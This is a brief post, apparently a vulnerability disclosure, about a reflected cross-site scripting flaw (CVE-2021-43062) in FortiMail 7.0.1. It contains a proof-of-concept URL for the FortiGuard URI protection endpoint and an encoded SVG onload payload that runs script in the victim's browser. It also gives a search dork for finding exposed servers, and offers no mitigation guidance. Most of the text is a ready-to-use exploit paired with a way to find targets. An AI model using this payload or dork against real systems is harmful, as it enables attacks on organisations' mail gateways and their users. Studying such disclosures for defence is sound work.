Fortinet Fortimail 7.0.1 — Reflected Cross-Site Scripting (CVE-2021-43062)
An improper neutralization of input during web page generation vulnerability in FortiMail may allow an unauthenticated attacker to perform an XSS attack via crafted HTTP GET requests to the FortiGuard URI protection service.
PoC:
https://example/fmlurlsvc/?=&url=https%3A%2F%http://google.com%3CSvg%2Fonload%3Dalert(1)%3E
Payload:
https%3A%2F%http://google.com%3CSvg%2Fonload%3Dalert(1)%3E
Dork:
inurl:/fmlurlsvc/
#fortinet #fortimail #xss